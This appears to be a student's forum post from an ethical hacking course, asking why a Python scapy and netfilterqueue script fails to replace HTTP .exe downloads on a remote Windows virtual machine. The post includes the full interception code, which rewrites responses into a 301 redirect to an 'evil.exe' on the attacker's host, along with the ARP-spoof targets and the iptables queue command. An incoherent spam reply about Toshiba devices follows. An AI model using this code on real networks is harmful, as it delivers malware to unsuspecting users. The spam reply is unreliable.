Issue with Intercepting and Replacing Downloads on the Network

Hi @Zaid

I am following your course on Learn Python & Ethical Hacking From Scratch and I am in the section called intercepting and replacing downloads on the network.

When trying to redirect the download with the replace download program, everything works fine locally. But the program does not work with a remote machine. I am using the windows ova as the remote machine and its IP is 192.168.1.85. The virtual box is not Natted but I am using bridged adapter which is fine.

If in the windows machine I try to download a zip file from an http site, such as here : http://www.rejetto.com/hfs/?f=dl, the file that is residing on the kali machine does not get downloaded. I put a print statement to debug the issue inside the program to see the contents of the modified package, and it is actually showing that the download is being redirected. See the output from replace_downloads.py:

root@kali:~/PycharmProjects/replace_downloads# python replace_downloads.py
[+x] exe Request
[+] Replacing file…
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = None
id = 50927
flags = DF
frag = 0
ttl = 49
proto = tcp
chksum = None
src = 185.20.49.7
dst = 192.168.1.85
\options
###[ TCP ]###
sport = http
dport = 50284
seq = 3077993074
ack = 2106145140
dataofs = 5
reserved = 0
flags = A
window = 238
chksum = None
urgptr = 0
options = []
###[ Raw ]###
load = ‘HTTP/1.1 301 Moved Permanently\nLocation: http://192.168.1.81/evil-files/evil.exe\n\n

Here is the code:

#!/usr/bin/env python

import scapy.all as scapy
import netfilterqueue

ack_list = []

def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet

def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
if “.exe” in scapy_packet[scapy.Raw].load:
print("[+x] exe Request")
ack_list.append(scapy_packet[scapy.TCP].ack)
elif scapy_packet[scapy.TCP].sport == 80:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("[+] Replacing file…")
modified_packet = set_load(scapy_packet,“HTTP/1.1 301 Moved Permanently\nLocation: http://192.168.1.81/evil-files/evil.exe\n\n” )

            packet.set_payload(str(modified_packet))
            print(modified_packet.show())



packet.accept()

queue = netfilterqueue.NetfilterQueue()

queue.bind(0, process_packet)
queue.run()

In arp_spoof I have this piece for the target machine ( the windows )

target_ip = “192.168.1.85”
gateway_ip = “192.168.1.254”
try:

I do clear the history of the browser, flush the iptables and use

iptables -I FORWARD -j NFQUEUE --queue-num 0

each time I try. For some reason, the actual hdf.exe gets downloaded instead of the dummy evil.exe I placed in the Kali Linux machine.

I am not really sure what is missing and I’d appreciate any help or guidance!

Thank you!

oh and also I noticed one other thing that in the output, the chksum and len in the IP layer and chksm in the TCP layer do not seem to be recalculated automatically, and I am not sure if this is normal after we delete them inside the set_load function in the main code. According to the lecture, scapy is supposed to recalculate it for us, but I don’t know if it gets placed in the output or not. Thanks again!

See, I found some different tricks and from there you will do one thing just get some review by which you will be fine for all. For that, if you need a strong network then you will be fine for all. You will use Toshiba devices which is good for all.

toshiba error 0xc0000185